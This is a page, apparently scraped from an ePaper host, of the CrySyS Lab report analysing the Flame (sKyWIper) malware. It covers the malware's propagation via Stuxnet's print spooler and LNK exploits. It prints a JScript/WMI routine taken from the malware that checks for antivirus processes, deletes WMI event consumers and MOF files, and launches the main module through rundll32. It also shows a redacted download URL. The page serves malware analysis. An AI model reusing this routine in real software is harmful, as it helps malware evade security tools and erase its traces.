15.07.2013 Views

sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex ... - CrySyS Lab

sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex ... - CrySyS Lab

sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex ... - CrySyS Lab

SHOW MORE
SHOW LESS

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

It would be useful to describe here the exact meaning of the abbreviated functionality (SHR,<br />

ABH, BHD, DLV, SMLData, VBinfo, OFR, PF, PGHDict) of this interesting library, however,<br />

currently we do not have enough information on it.<br />

CreatePGHDict might be associated with some Bluetooth related activities.<br />

EnableSHR might be connected to ~DEB93D creation which contains samba nmb name<br />

resolution traffic log.<br />

3.7. Installation and propagation method<br />

There are multiple ways for the malware to propagate. One method we are aware of is<br />

related to windows update and file downloading by some modules using SSL and some<br />

proprietary text based protocol. We also have clear indications that Stuxnet’s print spooler<br />

exploit (MS10-061) and lnk exploit (MS10-046) is used within <strong>sKyWIper</strong> as well:<br />

var objFileSystem = new ActiveXObject("Scripting.FileSystemObject");var s =<br />

GetObject("winmgmts:root\\cimv2");var oProcs = s.ExecQuery("SELECT * FROM<br />

Win32_Process WHERE name='outpost.exe' or name='aupdrun.exe' or name='op_mon.exe'<br />

or<br />

name='avp.exe'");s.Delete("__EventFilter.Name='FilterForClassCreation'");s.Delete("<br />

ActiveScriptEventConsumer.Name='ActiveScriptForSvc'");s.Delete("MyTestClass");s.Del<br />

ete("__Win32Provider.Name='ActiveScriptEventConsumer'");var f =<br />

objFileSystem.GetFile("wbem\\mof\\good\\svchostevt.mof");f.Delete(true);<br />

f =objFileSystem.GetFile("testpage");f.Delete(true);if (!oProcs.Count) { s1 = new<br />

ActiveXObject("Wscript.Shell");s1.Run("%SYSTEMROOT%\\system32\\rundll32.exe<br />

msdclr64.ocx,DDEnumCallback");while (true) { var oProcs = s.ExecQuery("SELECT *<br />

FROM Win32_Process WHERE name='rundll32.exe'"); if (!oProcs.Count) break; } var f =<br />

objFileSystem.GetFile("msdclr64.ocx");f.Delete(true);} else { var f =<br />

objFileSystem.GetFile("msdclr64.ocx"); f.Delete(true);}<br />

where msdclr64.ocx refers to the main module<br />

Figure 12 – Printer problem related routines in the malware<br />

URL:<br />

http:///view.php?mp=1&jz=1627XXXXXX&fd=1463XXXXXX&<br />

am=55XXXXXXX55X&ef=962DXXX7EC84XXXXEC84&pr=1&ec=0&ov=66664XXXXX6641XXXXX64174&pl=gs<br />

pndXXXXXX|spnZXXX|nyXXX|0nXXX|TWvXXXX|nGcXXX…<br />

some 30-50 tags more XXX are deliberately deleted<br />

Figure 13 – URL used to download mssecmgr.sys by some installation part<br />

<strong>Lab</strong>oratory of Cryptography and System Security (<strong>CrySyS</strong>)<br />

Budapest University of Technology and Economics<br />

www.crysys.hu 22

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!